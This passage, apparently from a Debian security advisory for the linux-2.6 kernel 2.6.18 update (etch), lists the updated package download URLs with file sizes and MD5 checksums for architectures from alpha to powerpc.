http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-18etch3_all.deb\n    Size/MD5 checksum: 41463452 67e56915cd61f4b0058aa668e284ca8c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-18etch3_all.deb\n    Size/MD5 checksum:  1085670 9c6513bc6e29a63d0aedc8da8958fc3f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-18etch3_all.deb\n    Size/MD5 checksum:  3752262 e2f225858212089b10aa319236d300f3\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum:  3027694 ef8b352212a8184702407e69cb7046bd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum:   268330 7b7d0ab15fe537a59c68b35531750739\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum:    54038 f42aafb19b9fae6445d0581277b60e92\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum: 23531650 8633558cda9f10fbadbc9299dde77575\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum:    54074 f4b61f5f330a7a2248d91432fa307f41\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum:   268076 09bdbafb6d32a4d9f8ceab5f1a6c666e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum: 23484202 d14e2e1d8537aa0cb2f2367f6ddd6762\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum: 23844262 0cb427290707d8a59a3afdf68f523e6b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum:  3052524 4323a32807ee9a2a7f13bc605ef0a9c7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum:   268772 bcec817953f14a50253dbe83e16d6c70\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum: 23462618 f6873f376755c4f29b24d0d11c9d70ae\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch3_alpha.deb\n    Size/MD5 checksum:   267446 376df6aed1989d65f8144f8790862e17\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum: 15260738 6c000df81a113d2d69a9473a3d764f08\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum: 16859134 9480377d14efcd65c7bde090d2c18023\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:  3357018 fcb1a842f85110b4a37d246621027ad3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:   271914 9a7953d1adbcfbbea07a1357450f34a0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum: 15272470 2581dfa79e27ead359eb27642748b3df\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:    54066 ce821a602278441fb157d2e8dffa7840\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum: 16820486 a1540f416895111ff4a4f6dc8d5ae2ad\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:  3191118 dae286014c3a55824e3cb3040948caa4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:   271584 5246a3f1ccb78bde203aab0338e90cd3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:    54038 20567a8f59997151900492fbbdb5a5bf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:    54012 fcd8a752e777bf97667914fe658ca440\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:  3167674 8fed61ce7278a060d600e54481851c2b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:  3334306 bd7dd1d9b1518e0e52f3d513ad9f7cea\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:  1650934 92ab0f73f6d2a1699f975ebede812c99\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:    54034 224990e92d1255bac74a4a540ef8ee15\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:   271184 4d2dfd603bf61408db599c9a972d6824\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:  1682946 a2ccb197f0b4bc35e889a61c095add5e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb\n    Size/MD5 checksum:   272850 4cab43a5199e6764b4857a91aaa52e09\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:  7924514 6f93e2c2e0f3e5ddeddb95bd50d560ef\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:   233088 acb0dd092348b024f08e0fc2467c31f3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:    54104 1437f25c10919b2f944295b8d7f168d8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:    54064 1afdbacaa80466a4705a9b7ef50a4a9d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:   239810 542097b2625db36fa56dfd7a29b66f37\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:   233830 e9a09a7d2a3927486adc68e1f1f7f0f8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:  3410416 dfc64565c01ac1f01784d72a8befa378\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:  7566074 822c9f74d2a88f4ac8e94210ecb06752\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:   204874 1b773fb8b26f20629b8c868db90c5521\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:  5009022 ef23e40a692019b29f03f1ef7c864e12\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:  4586924 66c55044ecf936cf08b69e3f78f8318e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:  8870890 a5a52727b1e019791b260c65d4793911\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-18etch3_arm.deb\n    Size/MD5 checksum:   198750 09c8bda5566b05dd0f969dedfc316d4c\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum: 10552252 247e3774a6493211af6575531966a8a4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum:  3020374 69fbbe6591cdab73257c9f68bacb63c0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum:    54044 77f6c66523dba6bb546b28b6b40b51e9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum:   196344 3ed099784ab8fe2f625462b1689ea7cd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum:   196818 f0d8bbb055a380b4c2b6064bbd9de0ac\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum:    54068 f91b5aa270a091f57a246e4cf1f6924a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum:   195368 29352673ddd4364e7dab3f5a1eb6e2d1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum:   197570 bde8500410397921905e78f71cd68a10\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum: 11398348 8201e0a1b33c60d737fb2821dadb8d18\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum: 10999924 6a0b08925946b094d1638ca20095df15\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch3_hppa.deb\n    Size/MD5 checksum: 11806360 7e63ef04531d59c2e3d0c93893d09bf0\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 16376092 f7e958b27f039bb044d46f94cc0c9231\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:    54014 593ee26c9bed3b3c853511c6bbbd13ea\n  http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2_i386.deb\n    Size/MD5 checksum: 25583354 6cc7cc34a241783bb8f3b2c9da7595a2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   278502 0f7f0e13f78438eeb1a939a637b8070c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 16466936 99c66acfa3cd0c109f0d3e2eaedf8877\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   279716 62626201a89882bab17d10ce706b2df5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 14289932 049b2b4696e9cbeec20ec8c2056c7185\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   277596 042152b79d08eea568fd7481b4849386\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 16507076 a1a5845401d351c6fa1f380565bcb5d6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 16190600 6c50e29e1616140b367e626c93db2ae4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   271900 8d74262b41e039125ce896f8e8d2f8bd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   272690 94db026fc7d498b48c5ac0b504f63390\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:  1299670 879785b1ee5f4ef0bec7423e5c7599e9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 14279230 3101d59c0d8ad8bf617f4d0eefbbb7de\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:    54088 e23a1d89d0f998caed5b594c5762dc19\n  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:    54032 d7b04d8d6f7a0d43579a499e4e0b681b\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2_i386.deb\n    Size/MD5 checksum:  5518204 0ce72fa3c9dfd208b1afa6912ffbcc3d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 16336828 0780d6d13e90466249f83e6d72ce1780\n  http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3_i386.deb\n    Size/MD5 checksum:  5518218 b86648769c5d3db2eb79b1bf6d490c50\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:  3148608 633afcaaeb9d655b8bde34977bfd0bd5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   272236 a611f8a0301e945ce72af3610bc05350\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:  3054330 6cfae664f54be8c9ed3958c003f404c9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:  3167916 756a4eed5e44d0530c5f20a7bc80d3d2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   279366 357140fdeff990683639e8f290593b0c\n  http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3_i386.deb\n    Size/MD5 checksum: 25583596 f0c6d87c849d5384be99dba70d34fb0d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   282728 a6b21a6fc38381b3884b2d2cd052d306\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 16836766 be9c22427d5666a80bf96e4c6501ebf7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:    54030 125894b7dd2b90ba5f48de2e7f04518b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:  1326708 add492f75bb0337e6e69a4afb73114c6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum: 16404432 9411c28cfbb27329417aa28b32de764c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:  3170704 6b86d80969e7f62ceaae5ee5af7f1a5c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-18etch3_i386.deb\n    Size/MD5 checksum:   279198 92c75044e071977263a20c444ee655d0\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-18etch3_ia64.deb\n    Size/MD5 checksum:   255464 ad4b1e9a12ca70ebb46a4c0f77bb62bf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-18etch3_ia64.deb\n    Size/MD5 checksum: 28013676 bacb3a11176542aa961867eaac8539d3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch3_ia64.deb\n    Size/MD5 checksum: 28181506 d0c75846976e8ebcd8baf1ee64a46414\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_ia64.deb\n    Size/MD5 checksum:    54036 746e70c193f28c412acec61cf63e4572\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-18etch3_ia64.deb\n    Size/MD5 checksum:    54050 fa3dc6c7671185e9ce4f7a00783990dc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_ia64.deb\n    Size/MD5 checksum:  3081858 970b72442606e4878d77a274d4fa4306\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch3_ia64.deb\n    Size/MD5 checksum:   255414 885054343ab6670ce1d90f7bdda61ef2\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:   167030 7bce3329b9fc5d10faafecfac21bc70a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:   186870 37e9b246abeb84886cd9a6215187f229\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:  8309262 893346de1a07ed015320fe333fc41037\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum: 15653182 1938128d29990cc16bc3f829d3fa1cbf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:  6125514 e6842c7aedc7b70d5a4a5d8e624e9627\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:   162870 5ebcff098fd97c89bc0f3057f68c3e31\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:    54110 9408231d8eb91431b2ca495f1e94f3cb\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:    54054 ed109dbb8bf134256164d6d07bd061f6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:  3413590 6013078ea705dbf5367d284f6ae401a4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:   154266 e5775b643e07055ec7121815d9316e62\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:   186682 9027d5504f2739d64d1bb4111ec5e136\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum: 15677870 4b5a1f2e56c587a0d470ea17fab07647\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch3_mips.deb\n    Size/MD5 checksum:  9075438 02f535440d5018de7b6233b232aa04de\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:  9863510 a6c8def78ca64e8e8b6ef10533186d30\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:   149960 2e09d53e58663189a043b7d7493cec8e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:  5926528 cb0dfe477608a2da181596f9b78ceddc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:   155716 76a619c24cc74cfe22ab42f9f2964096\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:    54040 affef50872a733868e2e3d58d566993a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:   155772 dd2d75f96ee5dd4c7a7ff8250f631649\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:   182490 f6be30e57bbff0ecace79826d4474bb3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:  5941862 45689ea22cb4ebdfb71936f79e00eebe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:   178194 4baf9d4d2fed0b5e3f12add06fae014b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:  3350066 4938243e89da8ace26c47d00bc60acf1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:   182706 84024a93ebcd9d394f179c8ee254ef1b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum: 15053292 024f0d5e1fbaf5c7d5664aca87ac8741\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:    54102 d25d6e1de865a3da93959dd8f8034d7f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum:  6027404 26b3c01fd8f1c798189c1ee5ec44d11c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mipsel.deb\n    Size/MD5 checksum: 15030096 69c0f1d1c25f49c3201a0b3edc1873b0\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum: 16402406 7f918a1714d84f8ccb6aaf1a13fc518e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum: 17016786 c06998d5b9b3c192bde5ecc4119830a1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:    54088 3683bf42ff1af3009202bf4c6a0e30cd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum: 16626352 37c3c60edcd7f7b22ededfcda073b5a8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:   251358 20ade66e354f4473ff045bb0e4e2f7c5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:   229986 a6996ddd8cd1f5439aecfc4693ab83f9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:    54036 d451146b15c05d5d630f72a3399a3464\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum:   253356 69fd6bca694ce1aea2788658eb530d3e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch3_powerpc.deb\n    Size/MD5 checksum: 18348404 